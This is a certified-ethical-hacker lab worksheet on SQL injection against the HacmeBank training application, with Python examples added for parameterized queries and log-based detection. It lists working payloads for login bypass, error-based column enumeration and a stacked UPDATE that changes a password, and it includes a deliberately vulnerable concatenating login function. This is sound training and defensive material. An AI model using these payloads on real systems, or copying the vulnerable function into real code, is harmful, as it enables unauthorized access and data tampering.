©2011-BR

CEH - SQL INJECTION

Configuration:

Your machine is TARGET-A, running Windows 2003 server.

Objectives:

Use SQL injection against the HACMEBANK application to bypass password authentication, then enumerate field names and try to insert a new record.

Tools:

Internet Explorer.
HACMEBANK application.

Preparation:

To log in to the HACMEBANK application, use the following credentials :

Username : jv
Password : jv789


I. AUTHENTICATION BYPASS
Detailed Steps:

1. On TARGET-A, open Internet Explorer and go to this URL :

http://localhost/HacmeBank_v2_Website/aspx/login.aspx

2. Try to log in with username : jv , password : jv789

3. You will see a welcome message and a logout button. These two items indicate
that you have successfully logged on to HACMEBANK.

4. Then log out.


5. Then try to log in using :

Username : jv
Password : ' or 1=1 --

You should still be able to log in without knowing the password.

Log out again.
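Why the value in step 5 works, and what stops it, as an added Python example that is not part of the lab and not HacmeBank's own code: a constructed in-memory SQLite table named after the lab's FSB_USERS columns, a login routine that concatenates the submitted text into the SQL (the flaw the lab exploits), and the same routine written with bound parameters. The table contents and the helper names are assumptions for illustration; SQLite stands in for the lab's SQL Server.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the lab's FSB_USERS table (assumed schema and
    one assumed row, not HacmeBank's real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE fsb_users ("
        "user_id INTEGER PRIMARY KEY, user_name TEXT, login_id TEXT, "
        "password TEXT, creation_date TEXT)"
    )
    conn.execute(
        "INSERT INTO fsb_users VALUES (1, 'jv-user', 'jv', 'jv789', '2011-01-01')"
    )
    conn.commit()
    return conn


def login_vulnerable(conn, login_id, password):
    """Builds the statement by string concatenation, so whatever the user
    typed becomes SQL text. Returns user_name on success, otherwise None.

    With password = "' or 1=1 --" the statement becomes
      ... WHERE login_id = 'jv' AND password = '' or 1=1 --'
    AND binds tighter than OR, so the WHERE clause is always true and the
    closing quote is commented out.
    """
    sql = (
        "SELECT user_name FROM fsb_users WHERE login_id = '" + login_id
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, login_id, password):
    """Sends the SQL text and the values separately. The driver binds the
    values as data, so quotes, OR and -- inside them never alter the query;
    the injected string is simply compared, as a whole, against the stored
    password and fails to match."""
    sql = "SELECT user_name FROM fsb_users WHERE login_id = ? AND password = ?"
    row = conn.execute(sql, (login_id, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    injected = "' or 1=1 --"  # the password value from step 5 of the lab
    print("vulnerable, real password:    ", login_vulnerable(db, "jv", "jv789"))
    print("vulnerable, injected value:   ", login_vulnerable(db, "jv", injected))
    print("parameterized, real password: ", login_parameterized(db, "jv", "jv789"))
    print("parameterized, injected value:", login_parameterized(db, "jv", injected))
```

The hardened routine still authenticates the real credentials; only the concatenated version lets the injected value through. The same holds for every payload later in the lab: bound parameters keep the quote, UNION, HAVING and the stacked `;` inside a string literal instead of the statement.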


II. TABLE ENUMERATION

1. First, try to generate an error message using the input form.

On the username input box, type :

' having 1=1 --

This makes the application display the error message :

Column 'fsb_users.user_id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

From there we can determine that the name of the table storing login information is
FSB_USERS and that it has a column named USER_ID.


2. The next step is to obtain the names of all the columns of the table.

So, we input this text into the username box :

' union select * from fsb_users where user_id = 'jv' group by user_id --

This results in a SQL exception that reveals an additional column name :

Column 'fsb_users.user_name' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.


Continue to enumerate all columns, adding the column revealed by each error to the GROUP BY list :

3. ' union select * from fsb_users where user_id = 'jv' group by user_id, user_name having 1=1 --

4. ' union select * from fsb_users where user_id = 'jv' group by user_id, user_name, login_id having 1=1 --

5. ' union select * from fsb_users where user_id = 'jv' group by user_id, user_name, login_id, password having 1=1 --

6. ' union select * from fsb_users where user_id = 'jv' group by user_id, user_name, login_id, password, creation_date having 1=1 --

Repeat until you see this error message :


III. CHANGING PASSWORD


You now have the table structure :

FSB_USERS.user_id
FSB_USERS.user_name
FSB_USERS.login_id
FSB_USERS.password
FSB_USERS.creation_date

1. After this, you need to know the data type of the column FSB_USERS.password. Use this
SQL statement :

' UNION SELECT SUM(PASSWORD) FROM FSB_USERS HAVING 1=1 --

You will get an error message stating that the FSB_USERS.password data type is
VARCHAR :

The sum or average aggregate operation cannot take a varchar data type as an argument

2. Then try to change the password of username 'jv' (FSB_USERS.password)
using the SQL syntax below :

'; UPDATE FSB_USERS SET PASSWORD = 'TEST123' WHERE LOGIN_ID = 'JV' --

You will see an error; this is normal. Just try to log in using the new password.
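Every stage of sections II and III leaves a distinctive trace in whatever the application logs for the username field, and each stage only works because the raw database error is returned to the browser. The following Python example is added here and is not part of the lab or of HacmeBank: it scans a constructed application audit log (the line format, timestamps and the `o'brien` entry are assumptions) and tags each login attempt with the stage of the technique it matches, so a reviewer can see the probe sequence at a glance. The patterns are the ones that appear in the lab's own inputs.

```python
import re

# Constructed audit log (not from the lab): one line per login attempt, with the
# submitted username quoted verbatim and the outcome the application recorded.
SAMPLE_LOG = """\
2011-03-01 10:00:01 login login_id="jv" result=success
2011-03-01 10:01:12 login login_id="o'brien" result=failure
2011-03-01 10:02:40 login login_id="' having 1=1 --" result=db_error
2011-03-01 10:03:05 login login_id="' union select * from fsb_users where user_id = 'jv' group by user_id --" result=db_error
2011-03-01 10:03:40 login login_id="' UNION SELECT SUM(PASSWORD) FROM FSB_USERS HAVING 1=1 --" result=db_error
2011-03-01 10:04:30 login login_id="'; UPDATE FSB_USERS SET PASSWORD = 'TEST123' WHERE LOGIN_ID = 'JV' --" result=db_error
"""

# Assumed line layout: "<date> <time> login login_id="<value>" result=<word>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+ \S+) login login_id="(?P<login_id>.*)" result=(?P<result>\w+)$'
)

# One rule per stage of the lab, in ascending order of severity. A lone quote
# (as in o'brien) is deliberately not a rule: it is normal in real names.
RULES = [
    ("comment_terminator", re.compile(r"--\s*$")),                       # trailing -- (all sections)
    ("tautology", re.compile(r"\bor\s+\d+\s*=\s*\d+", re.I)),            # or 1=1 (section I)
    ("error_based_probe", re.compile(r"\b(having|group\s+by)\b", re.I)),  # HAVING / GROUP BY (section II)
    ("union_select", re.compile(r"\bunion\s+select\b", re.I)),           # UNION SELECT (sections II, III)
    ("stacked_write", re.compile(r";\s*(update|insert|delete|drop)\b", re.I)),  # '; UPDATE (section III)
]


def classify(value):
    """Return the names of every rule the submitted value matches, in RULES order."""
    return [name for name, rx in RULES if rx.search(value)]


def scan_log(text):
    """Parse the log and return one finding per flagged attempt. 'severity' is the
    most serious matching stage; 'result' shows whether the app leaked a DB error."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated log line; ignore
        tags = classify(m["login_id"])
        if tags:
            findings.append({
                "line": lineno,
                "ts": m["ts"],
                "login_id": m["login_id"],
                "result": m["result"],
                "tags": tags,
                "severity": tags[-1],
            })
    return findings


def leaked_error_count(findings):
    """Count flagged attempts where the application answered with a database error,
    i.e. the disclosure that makes the column enumeration in section II possible."""
    return sum(1 for f in findings if f["result"] == "db_error")


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} {f['ts']} severity={f['severity']:<18} "
              f"result={f['result']:<8} tags={','.join(f['tags'])}")
    print("attempts answered with a raw DB error:", leaked_error_count(scan_log(SAMPLE_LOG)))
```

Two things fall out of the scan. The benign `o'brien` attempt is not flagged, so a quote alone is not a useful signal; the keywords and the trailing comment are. And every flagged attempt has `result=db_error`, which is the application handing the column names of FSB_USERS to the client; returning a generic error page and writing the exception detail only to the server-side log removes what sections II and III depend on, while bound parameters (as in the earlier example) remove the injection itself.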
